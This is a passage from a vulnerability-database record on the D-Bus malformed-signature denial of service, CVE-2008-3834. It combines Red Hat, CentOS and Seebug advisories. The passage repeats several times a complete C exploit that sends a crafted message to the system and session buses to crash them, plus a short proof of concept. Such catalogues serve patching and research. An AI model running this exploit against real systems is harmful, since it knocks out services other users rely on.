&val); \ndbus_message_iter_close_container(&iter3, &iter4); \ndbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val); \ndbus_message_iter_close_container(&iter2, &iter3); \ndbus_message_iter_close_container(&iter1, &iter2); \n \nprintf(\"[+] connecting to dbus system daemon...\\n\"); \n \nsystem = dbus_bus_get(DBUS_BUS_SYSTEM, NULL); \n \nif (system) { \nprintf(\"[+] killing dbus system daemon...\\n\"); \n \ndbus_connection_send(system, message, NULL); \ndbus_connection_flush(system); \ndbus_connection_unref(system); \n} else { \nprintf(\"[-] error: could not connect to dbus system daemon\\n\"); \n} \n \nprintf(\"[+] connecting to dbus session daemon...\\n\"); \n \nsession = dbus_bus_get(DBUS_BUS_SESSION, NULL); \n \nif (session) { \nprintf(\"[+] killing dbus session daemon...\\n\"); \n \ndbus_connection_send(session, message, NULL); \ndbus_connection_flush(session); \ndbus_connection_unref(session); \n} else { \nprintf(\"[-] error: could not connect to dbus session daemon\\n\"); \n} \n \ndbus_message_unref(message); \n \nreturn 0; \n} \n \n`\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/74119/dbus-dos.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:11", "description": "\nD-Bus Daemon 1.2.4 - libdbus Denial of Service", "edition": 1, "published": "2009-01-19T00:00:00", "title": "D-Bus Daemon 1.2.4 - libdbus Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2009-01-19T00:00:00", "id": "EXPLOITPACK:03EDEADC4429D708F596466B2E2F298F", "href": "", "sourceData": "/*\n * cve-2008-3834.c\n *\n * D-Bus Daemon Denial of Service < 1.2.4\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n *\n * Usage:\n *\n * $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834\n * $ ./cve-2008-3834\n * \n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834\n *\n * The dbus_signature_validate function in the D-bus library (libdbus) \n * before 1.2.4 allows remote attackers to cause a denial of service \n * (application abort) via a message containing a malformed signature,\n * which triggers a failed assertion error. \n *\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n\n#include <dbus/dbus.h>\n\n#define DEST \"org.freedesktop.ExampleService\"\n#define NAME \"org.freedesktop.ExampleInterface.ExampleMethod\"\n#define PATH \"/org/freedesktop/sample/object/name\"\n#define SIGNAL \"ExampleMethod\"\n\nint\nmain(int argc, char *argv[])\n{\n\tchar sig[8];\n\tuint32_t val = 0xdeadbeef;\n\tDBusMessage *message;\n\tDBusConnection *system, *session;\n\tDBusMessageIter iter1, iter2, iter3, iter4;\n\n\tprintf(\"[+] creating malicious dbus message...\\n\");\n\n\tmessage = dbus_message_new_signal(PATH, NAME, SIGNAL);\n\tif (!message) {\n\t\tprintf(\"[-] error: could not create dbus message\\n\");\n\t\treturn 1;\n\t}\n\tif (!dbus_message_set_destination(message, DEST)) {\n\t\tprintf(\"[-] error: could not create set dbus destination\\n\");\n\t\treturn 1;\n\t}\n\n\tsig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR;\n\tsig[1] = DBUS_STRUCT_BEGIN_CHAR;\n\tsig[2] = DBUS_TYPE_INT32;\n\tsig[3] = DBUS_TYPE_INT32;\n\tsig[4] = DBUS_STRUCT_END_CHAR;\n\tsig[5] = DBUS_TYPE_INT32;\n\tsig[6] = DBUS_DICT_ENTRY_END_CHAR;\n\tsig[7] = '\\0';\n\n\tdbus_message_iter_init_append(message, &iter1);\n\tdbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2);\n\tdbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3);\n\tdbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4);\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\n\tdbus_message_iter_close_container(&iter3, &iter4);\n\tdbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val);\n\tdbus_message_iter_close_container(&iter2, &iter3);\n\tdbus_message_iter_close_container(&iter1, &iter2);\n\n\tprintf(\"[+] connecting to dbus system daemon...\\n\");\n\n\tsystem = dbus_bus_get(DBUS_BUS_SYSTEM, NULL);\n\n\tif (system) {\n\t\tprintf(\"[+] killing dbus system daemon...\\n\");\n\n\t\tdbus_connection_send(system, message, NULL);\n\t\tdbus_connection_flush(system);\n\t\tdbus_connection_unref(system);\n\t} else {\n\t\tprintf(\"[-] error: could not connect to dbus system daemon\\n\");\n\t}\n\n\tprintf(\"[+] connecting to dbus session daemon...\\n\");\n\n\tsession = dbus_bus_get(DBUS_BUS_SESSION, NULL);\n\n\tif (session) {\n\t\tprintf(\"[+] killing dbus session daemon...\\n\");\n\n\t\tdbus_connection_send(session, message, NULL);\n\t\tdbus_connection_flush(session);\n\t\tdbus_connection_unref(session);\n\t} else {\n\t\tprintf(\"[-] error: could not connect to dbus session daemon\\n\");\n\t}\n\n\tdbus_message_unref(message);\n\n\treturn 0;\n}\n\n// milw0rm.com [2009-01-19]", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:07", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3834"], "description": "D-Bus is a system for sending messages between applications. It is used for\nthe system-wide message bus service and as a per-user-login-session\nmessaging facility.\n\nA denial-of-service flaw was discovered in the system for sending messages\nbetween applications. A local user could send a message with a malformed\nsignature to the bus causing the bus (and, consequently, any process using\nlibdbus to receive messages) to abort. (CVE-2008-3834)\n\nAll users are advised to upgrade to these updated dbus packages, which\ncontain backported patch which resolve this issue. For the update to take\neffect, all running instances of dbus-daemon and all running applications\nusing libdbus library must be restarted, or the system rebooted.", "modified": "2017-09-08T12:06:32", "published": "2009-01-07T05:00:00", "id": "RHSA-2009:0008", "href": "https://access.redhat.com/errata/RHSA-2009:0008", "type": "redhat", "title": "(RHSA-2009:0008) Moderate: dbus security update", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T18:44:59", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1189"], "description": "D-Bus is a system for sending messages between applications. It is used for\nthe system-wide message bus service and as a per-user-login-session\nmessaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008 did\nnot correctly fix the denial of service flaw in the system for sending\nmessages between applications. A local user could use this flaw to send a\nmessage with a malformed signature to the bus, causing the bus (and,\nconsequently, any process using libdbus to receive messages) to abort.\n(CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying it\nin production environments.\n\nAll users are advised to upgrade to these updated packages, which contain a\nbackported patch to correct this issue. For the update to take effect, all\nrunning instances of dbus-daemon and all running applications using the\nlibdbus library must be restarted, or the system rebooted.", "modified": "2017-09-08T11:49:17", "published": "2010-01-07T05:00:00", "id": "RHSA-2010:0018", "href": "https://access.redhat.com/errata/RHSA-2010:0018", "type": "redhat", "title": "(RHSA-2010:0018) Moderate: dbus security update", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-12-11T13:30:47", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1189", "CVE-2009-3767", "CVE-2010-0307", "CVE-2010-0410", "CVE-2010-0426", "CVE-2010-0427", "CVE-2010-0430", "CVE-2010-0730", "CVE-2010-0741", "CVE-2010-1085", "CVE-2010-1086", "CVE-2010-1163", "CVE-2010-2223"], "description": "The rhev-hypervisor package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way QEMU-KVM handled erroneous data provided by the\nLinux virtio-net driver, used by guest operating systems. Due to a\ndeficiency in the TSO (TCP segment offloading) implementation, a guest's\nvirtio-net driver would transmit improper data to a certain QEMU-KVM\nprocess on the host, causing the guest to crash. A remote attacker could\nuse this flaw to send specially-crafted data to a target guest system,\ncausing that guest to crash. (CVE-2010-0741)\n\nA flaw was found in the way the Virtual Desktop Server Manager (VDSM)\nhandled the removal of a virtual machine's (VM) data back end (such as an\nimage or a volume). When removing an image or a volume, it was not securely\ndeleted from its corresponding data domain as expected. A guest user in a\nnew, raw VM, created in a data domain that has had VMs deleted from it,\ncould use this flaw to read limited data from those deleted VMs,\npotentially disclosing sensitive information. (CVE-2010-2223)\n\nThis updated package provides updated components that include fixes for\nsecurity issues; however, these issues have no security impact for Red Hat\nEnterprise Virtualization Hypervisor. These fixes are for dbus issue\nCVE-2009-1189; kernel issues CVE-2010-0307, CVE-2010-0410, CVE-2010-0730,\nCVE-2010-1085, and CVE-2010-1086; openldap issue CVE-2009-3767; and sudo\nissues CVE-2010-0426, CVE-2010-0427, and CVE-2010-1163.\n\nThis update also fixes several bugs and adds several enhancements.\nDocumentation for these bug fixes and enhancements is available from\nhttp://www.redhat.com/docs/en-US/Red_Hat_Enterprise_Virtualization/2.2/html/Servers-5.5-2.2_Hypervisor_Security_Update\n\nAs Red Hat Enterprise Virtualization Hypervisor is based on KVM, the bug\nfixes and enhancements from the KVM updates RHSA-2010:0271 and\nRHBA-2010:0419 have been included in this update. Also included are the bug\nfixes and enhancements from the Virtual Desktop Server Manager (VDSM)\nupdate RHSA-2010:0473, and fence-agents update RHBA-2010:0477.\n\nKVM: https://rhn.redhat.com/errata/RHSA-2010-0271.html and\nhttps://rhn.redhat.com/errata/RHBA-2010-0419.html\nVDSM: https://rhn.redhat.com/errata/RHSA-2010-0473.html\nfence-agents: https://rhn.redhat.com/errata/RHBA-2010-0477.html\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects these issues and adds these\nenhancements.\n", "modified": "2019-03-22T23:44:52", "published": "2010-06-22T04:00:00", "id": "RHSA-2010:0476", "href": "https://access.redhat.com/errata/RHSA-2010:0476", "type": "redhat", "title": "(RHSA-2010:0476) Important: rhev-hypervisor security, bug fix, and enhancement update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:45:01", "bulletinFamily": "unix", "cvelist": ["CVE-2006-6304", "CVE-2007-4567", "CVE-2009-1189", "CVE-2009-2409", "CVE-2009-2730", "CVE-2009-2910", "CVE-2009-2957", "CVE-2009-2958", "CVE-2009-3080", "CVE-2009-3556", "CVE-2009-3563", "CVE-2009-3736", "CVE-2009-3889", "CVE-2009-3939", "CVE-2009-4020", "CVE-2009-4021", "CVE-2009-4138", "CVE-2009-4141", "CVE-2009-4212", "CVE-2009-4272", "CVE-2009-4355", "CVE-2009-4536", "CVE-2009-4537", "CVE-2009-4538", "CVE-2010-0001", "CVE-2010-0097", "CVE-2010-0298", "CVE-2010-0306", "CVE-2010-0309"], "description": "The rhev-hypervisor package provides a Red Hat Enterprise Virtualization\n(RHEV) Hypervisor ISO disk image. The RHEV Hypervisor is a dedicated\nKernel-based Virtual Machine (KVM) hypervisor. It includes everything\nnecessary to run and manage virtual machines: A subset of the Red Hat\nEnterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: RHEV Hypervisor is only available for the Intel 64 and AMD64\narchitectures with virtualization extensions.\n\nA flaw was found in the IPv6 Extension Header (EH) handling\nimplementation in the Linux kernel. The skb->dst data structure was not\nproperly validated in the ipv6_hop_jumbo() function. This could possibly\nlead to a remote denial of service. (CVE-2007-4567)\n\nThe Parallels Virtuozzo Containers team reported two flaws in the routing\nimplementation. If an attacker was able to cause a large enough number of\ncollisions in the routing hash table (via specially-crafted packets) for\nthe emergency route flush to trigger, a deadlock could occur. Secondly, if\nthe kernel routing cache was disabled, an uninitialized pointer would be\nleft behind after a route lookup, leading to a kernel panic.\n(CVE-2009-4272)\n\nA flaw was found in each of the following Intel PRO/1000 Linux drivers in\nthe Linux kernel: e1000 and e1000e. A remote attacker using packets larger\nthan the MTU could bypass the existing fragment check, resulting in\npartial, invalid frames being passed to the network stack. These flaws\ncould also possibly be used to trigger a remote denial of service.\n(CVE-2009-4536, CVE-2009-4538)\n\nA flaw was found in the Realtek r8169 Ethernet driver in the Linux kernel.\nReceiving overly-long frames with a certain revision of the network cards\nsupported by this driver could possibly result in a remote denial of\nservice. (CVE-2009-4537)\n\nThe x86 emulator implementation was missing a check for the Current\nPrivilege Level (CPL) and I/O Privilege Level (IOPL). A user in a guest\ncould leverage these flaws to cause a denial of service (guest crash) or\npossibly escalate their privileges within that guest. (CVE-2010-0298,\nCVE-2010-0306)\n\nA flaw was found in the Programmable Interval Timer (PIT) emulation. Access\nto the internal data structure pit_state, which represents the data state\nof the emulated PIT, was not properly validated in the pit_ioport_read()\nfunction. A privileged guest user could use this flaw to crash the host.\n(CVE-2010-0309)\n\nThis updated package provides updated components that include fixes for\nsecurity issues; however, these issues have no security impact for RHEV\nHypervisor. These fixes are for kernel issues CVE-2006-6304, CVE-2009-2910,\nCVE-2009-3080, CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,\nCVE-2009-4021, CVE-2009-4138, and CVE-2009-4141; ntp issue CVE-2009-3563;\ndbus issue CVE-2009-1189; dnsmasq issues CVE-2009-2957 and CVE-2009-2958;\ngnutls issue CVE-2009-2730; krb5 issue CVE-2009-4212; bind issue \nCVE-2010-0097; gzip issue CVE-2010-0001; openssl issues CVE-2009-2409 and \nCVE-2009-4355; and gcc issue CVE-2009-3736.\n\nThis update also fixes the following bugs:\n\n* on systems with a large number of disk devices, USB storage devices may\nget enumerated after \"/dev/sdz\", for example, \"/dev/sdcd\". This was not\nhandled by the udev rules, resulting in a missing \"/dev/live\" symbolic\nlink, causing installations from USB media to fail. With this update, udev\nrules correctly handle USB storage devices on systems with a large number\nof disk devices, which resolves this issue. (BZ#555083)\n\nAs RHEV Hypervisor is based on KVM, the bug fixes from the KVM update\nRHSA-2010:0088 have been included in this update:\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0088.html\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects these issues.", "modified": "2019-03-22T23:44:58", "published": "2010-02-09T05:00:00", "id": "RHSA-2010:0095", "href": "https://access.redhat.com/errata/RHSA-2010:0095", "type": "redhat", "title": "(RHSA-2010:0095) Important: rhev-hypervisor security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T21:24:13", "description": "BUGTRAQ ID: 31602\r\nCVE ID\uff1aCVE-2008-3834\r\nCNCVE ID\uff1aCNCVE-20083834\r\n\r\nD-BUS\u662f\u4e00\u6b3e\u8bbe\u8ba1\u76ee\u6807\u4e3a\u5e94\u7528\u7a0b\u5e8f\u95f4\u901a\u4fe1\u7684\u6d88\u606f\u603b\u7ebf\u7cfb\u7edf\u3002\r\nD-BUS\u4e0d\u6b63\u786e\u5904\u7406\u5305\u542b\u5728\u6d88\u606f\u4e2d\u7684\u7578\u5f62\u7b7e\u540d\uff0c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u5bf9\u4f7f\u7528\u6b64\u5e93\u7684\u5e94\u7528\u7a0b\u5e8f\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n\u5f53\u8981\u6c42\u9a8c\u8bc1\u7c7b\u578b\u7b7e\u540d"a{(ii)i}"\u65f6\u53ef\u5bfc\u81f4\u51fd\u6570dbus_signature_validate()\u51fa\u73b0\u9519\u8bef\u3002\r\n\u6839\u636e\u6587\u6863\uff0cdbus_signature_validate()\u53ef\u4ee5\u7528\u4e8e\u68c0\u67e5\u7c7b\u578b\u7b7e\u540d\u7684\u5408\u6cd5\u6027\uff0c\u56e0\u6b64\u6b63\u786e\u7684\u5fc5\u987b\u662f\u5bf9\u4e0a\u9762\u63d0\u5230\u7684\u7c7b\u578b\u7b7e\u540d\u786e\u5b9a\u4e3a\u975e\u6cd5\u3002\n\nD-BUS Inter-Process Communication System 1.2.1\n \u53ef\u53c2\u8003\u5982\u4e0b\u94fe\u63a5\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\n<a href=https://bugs.freedesktop.org/show_bug.cgi?id=17803 target=_blank>https://bugs.freedesktop.org/show_bug.cgi?id=17803</a>", "published": "2008-10-08T00:00:00", "type": "seebug", "title": "D-Bus 'dbus_signature_validate()'\u7c7b\u578b\u7b7e\u540d\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2008-10-08T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4172", "id": "SSV:4172", "sourceData": "\n #include <dbus/dbus.h>\r\nint main ()\r\n{\r\n return !dbus_signature_validate("a{(ii)i}", NULL);\r\n}\r\n \n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-4172", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T16:06:30", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "D-Bus Daemon < 1.2.4 - (libdbus) Denial of Service Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66216", "id": "SSV:66216", "sourceData": "\n /*\r\n * cve-2008-3834.c\r\n *\r\n * D-Bus Daemon Denial of Service < 1.2.4\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n *\r\n * Usage:\r\n *\r\n * $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834\r\n * $ ./cve-2008-3834\r\n * \r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834\r\n *\r\n * The dbus_signature_validate function in the D-bus library (libdbus) \r\n * before 1.2.4 allows remote attackers to cause a denial of service \r\n * (application abort) via a message containing a malformed signature,\r\n * which triggers a failed assertion error. \r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n\r\n#include <dbus/dbus.h>\r\n\r\n#define DEST "org.freedesktop.ExampleService"\r\n#define NAME "org.freedesktop.ExampleInterface.ExampleMethod"\r\n#define PATH "/org/freedesktop/sample/object/name"\r\n#define SIGNAL "ExampleMethod"\r\n\r\nint\r\nmain(int argc, char *argv[])\r\n{\r\n\tchar sig[8];\r\n\tuint32_t val = 0xdeadbeef;\r\n\tDBusMessage *message;\r\n\tDBusConnection *system, *session;\r\n\tDBusMessageIter iter1, iter2, iter3, iter4;\r\n\r\n\tprintf("[+] creating malicious dbus message...\\n");\r\n\r\n\tmessage = dbus_message_new_signal(PATH, NAME, SIGNAL);\r\n\tif (!message) {\r\n\t\tprintf("[-] error: could not create dbus message\\n");\r\n\t\treturn 1;\r\n\t}\r\n\tif (!dbus_message_set_destination(message, DEST)) {\r\n\t\tprintf("[-] error: could not create set dbus destination\\n");\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tsig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR;\r\n\tsig[1] = DBUS_STRUCT_BEGIN_CHAR;\r\n\tsig[2] = DBUS_TYPE_INT32;\r\n\tsig[3] = DBUS_TYPE_INT32;\r\n\tsig[4] = DBUS_STRUCT_END_CHAR;\r\n\tsig[5] = DBUS_TYPE_INT32;\r\n\tsig[6] = DBUS_DICT_ENTRY_END_CHAR;\r\n\tsig[7] = '\\0';\r\n\r\n\tdbus_message_iter_init_append(message, &iter1);\r\n\tdbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2);\r\n\tdbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3);\r\n\tdbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4);\r\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\r\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\r\n\tdbus_message_iter_close_container(&iter3, &iter4);\r\n\tdbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val);\r\n\tdbus_message_iter_close_container(&iter2, &iter3);\r\n\tdbus_message_iter_close_container(&iter1, &iter2);\r\n\r\n\tprintf("[+] connecting to dbus system daemon...\\n");\r\n\r\n\tsystem = dbus_bus_get(DBUS_BUS_SYSTEM, NULL);\r\n\r\n\tif (system) {\r\n\t\tprintf("[+] killing dbus system daemon...\\n");\r\n\r\n\t\tdbus_connection_send(system, message, NULL);\r\n\t\tdbus_connection_flush(system);\r\n\t\tdbus_connection_unref(system);\r\n\t} else {\r\n\t\tprintf("[-] error: could not connect to dbus system daemon\\n");\r\n\t}\r\n\r\n\tprintf("[+] connecting to dbus session daemon...\\n");\r\n\r\n\tsession = dbus_bus_get(DBUS_BUS_SESSION, NULL);\r\n\r\n\tif (session) {\r\n\t\tprintf("[+] killing dbus session daemon...\\n");\r\n\r\n\t\tdbus_connection_send(session, message, NULL);\r\n\t\tdbus_connection_flush(session);\r\n\t\tdbus_connection_unref(session);\r\n\t} else {\r\n\t\tprintf("[-] error: could not connect to dbus session daemon\\n");\r\n\t}\r\n\r\n\tdbus_message_unref(message);\r\n\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2009-01-19]\r\n\n ", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66216"}, {"lastseen": "2017-11-19T22:35:47", "description": "BUGTRAQ ID: 31602\r\nCVE(CAN) ID: CVE-2008-3834\r\n\r\nD-BUS\u662f\u4e00\u4e2a\u8bbe\u8ba1\u76ee\u6807\u4e3a\u5e94\u7528\u7a0b\u5e8f\u95f4\u901a\u4fe1\u7684\u6d88\u606f\u603b\u7ebf\u7cfb\u7edf\u3002\r\n\r\nD-BUS\u7684_dbus_validate_signature_with_reason()\u51fd\u6570\u6ca1\u6709\u6b63\u786e\u5730\u9a8c\u8bc1\u7c7b\u578b\u4ee3\u7801\uff1a\r\n\r\n if (last == DBUS_DICT_ENTRY_BEGIN_CHAR &&\r\n !dbus_type_is_basic (*p))\r\n {\r\n result = DBUS_INVALID_DICT_KEY_MUST_BE_BASIC_TYPE;\r\n goto out;\r\n }\r\n\r\n\u5982\u679c\u4f7f\u7528D-Bus\u7684\u5e94\u7528\u53d7\u9a97\u9a8c\u8bc1\u4e86\u7279\u5236\u7684\u7b7e\u540d\u7684\u8bdd\uff0c\u5c31\u53ef\u80fd\u4f1a\u7ec8\u6b62\u3002\r\n\n\nD-Bus 1.2.1\n D-Bus\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\n<a href=http://admin.fedoraproject.org/updates/dbus-1.2.4-1.fc9 target=_blank>http://admin.fedoraproject.org/updates/dbus-1.2.4-1.fc9</a>", "published": "2008-10-10T00:00:00", "title": "D-Bus dbus_signature_validate()\u7c7b\u578b\u7b7e\u540d\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2008-10-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4192", "id": "SSV:4192", "sourceData": "\n #include <dbus/dbus.h>\r\n\r\nint main ()\r\n{\r\n return !dbus_signature_validate("a{(ii)i}", NULL);\r\n}\r\n\n ", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-4192"}, {"lastseen": "2017-11-19T19:00:58", "description": "No description provided by source.", "published": "2009-01-19T00:00:00", "type": "seebug", "title": "D-Bus Daemon < 1.2.4 (libdbus) Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2009-01-19T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-17745", "id": "SSV:17745", "sourceData": "\n /*\n * cve-2008-3834.c\n *\n * D-Bus Daemon Denial of Service < 1.2.4\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n *\n * Usage:\n *\n * $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834\n * $ ./cve-2008-3834\n * \n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834\n *\n * The dbus_signature_validate function in the D-bus library (libdbus) \n * before 1.2.4 allows remote attackers to cause a denial of service \n * (application abort) via a message containing a malformed signature,\n * which triggers a failed assertion error. \n *\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n\n#include <dbus/dbus.h>\n\n#define DEST "org.freedesktop.ExampleService"\n#define NAME "org.freedesktop.ExampleInterface.ExampleMethod"\n#define PATH "/org/freedesktop/sample/object/name"\n#define SIGNAL "ExampleMethod"\n\nint\nmain(int argc, char *argv[])\n{\n\tchar sig[8];\n\tuint32_t val = 0xdeadbeef;\n\tDBusMessage *message;\n\tDBusConnection *system, *session;\n\tDBusMessageIter iter1, iter2, iter3, iter4;\n\n\tprintf("[+] creating malicious dbus message...\\n");\n\n\tmessage = dbus_message_new_signal(PATH, NAME, SIGNAL);\n\tif (!message) {\n\t\tprintf("[-] error: could not create dbus message\\n");\n\t\treturn 1;\n\t}\n\tif (!dbus_message_set_destination(message, DEST)) {\n\t\tprintf("[-] error: could not create set dbus destination\\n");\n\t\treturn 1;\n\t}\n\n\tsig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR;\n\tsig[1] = DBUS_STRUCT_BEGIN_CHAR;\n\tsig[2] = DBUS_TYPE_INT32;\n\tsig[3] = DBUS_TYPE_INT32;\n\tsig[4] = DBUS_STRUCT_END_CHAR;\n\tsig[5] = DBUS_TYPE_INT32;\n\tsig[6] = DBUS_DICT_ENTRY_END_CHAR;\n\tsig[7] = '\\0';\n\n\tdbus_message_iter_init_append(message, &iter1);\n\tdbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2);\n\tdbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3);\n\tdbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4);\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\n\tdbus_message_iter_close_container(&iter3, &iter4);\n\tdbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val);\n\tdbus_message_iter_close_container(&iter2, &iter3);\n\tdbus_message_iter_close_container(&iter1, &iter2);\n\n\tprintf("[+] connecting to dbus system daemon...\\n");\n\n\tsystem = dbus_bus_get(DBUS_BUS_SYSTEM, NULL);\n\n\tif (system) {\n\t\tprintf("[+] killing dbus system daemon...\\n");\n\n\t\tdbus_connection_send(system, message, NULL);\n\t\tdbus_connection_flush(system);\n\t\tdbus_connection_unref(system);\n\t} else {\n\t\tprintf("[-] error: could not connect to dbus system daemon\\n");\n\t}\n\n\tprintf("[+] connecting to dbus session daemon...\\n");\n\n\tsession = dbus_bus_get(DBUS_BUS_SESSION, NULL);\n\n\tif (session) {\n\t\tprintf("[+] killing dbus session daemon...\\n");\n\n\t\tdbus_connection_send(session, message, NULL);\n\t\tdbus_connection_flush(session);\n\t\tdbus_connection_unref(session);\n\t} else {\n\t\tprintf("[-] error: could not connect to dbus session daemon\\n");\n\t}\n\n\tdbus_message_unref(message);\n\n\treturn 0;\n}\n\n// milw0rm.com [2009-01-19]\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-17745", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "centos": [{"lastseen": "2019-12-20T18:28:26", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3834"], "description": "**CentOS Errata and Security Advisory** CESA-2009:0008\n\n\nD-Bus is a system for sending messages between applications. It is used for\nthe system-wide message bus service and as a per-user-login-session\nmessaging facility.\n\nA denial-of-service flaw was discovered in the system for sending messages\nbetween applications. A local user could send a message with a malformed\nsignature to the bus causing the bus (and, consequently, any process using\nlibdbus to receive messages) to abort. (CVE-2008-3834)\n\nAll users are advised to upgrade to these updated dbus packages, which\ncontain backported patch which resolve this issue. For the update to take\neffect, all running instances of dbus-daemon and all running applications\nusing libdbus library must be restarted, or the system rebooted.\n\n**Merged security bulletin from 